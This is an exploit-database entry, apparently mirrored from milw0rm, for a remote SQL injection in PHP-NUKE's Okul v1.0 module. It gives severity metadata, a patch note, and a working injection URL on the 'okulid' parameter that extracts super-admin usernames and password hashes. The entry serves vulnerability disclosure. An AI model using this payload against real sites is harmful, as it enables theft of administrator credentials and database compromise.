header-logo
Suggest Exploit
vendor:
Modules Okul
by:
xoron
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Modules Okul
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP-NUKE Modules Okul v1.0 Remote SQL Injection

A remote SQL injection vulnerability exists in PHP-NUKE Modules Okul v1.0. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. This is done by sending a specially crafted HTTP request to the vulnerable application containing malicious SQL statements in the 'okulid' parameter.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the application.
Source

Exploit-DB raw data:

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

PHP-NUKE Modules Okul v1.0 Remote SQL Injection

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Found: xoron

contact: xorontr@gmail.com (only e-mail)

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Exploit:
modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Thanx: str0ke, s@bun.

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-= 

# milw0rm.com [2008-02-20]

Navigation

Suggest Exploit

Services By CQR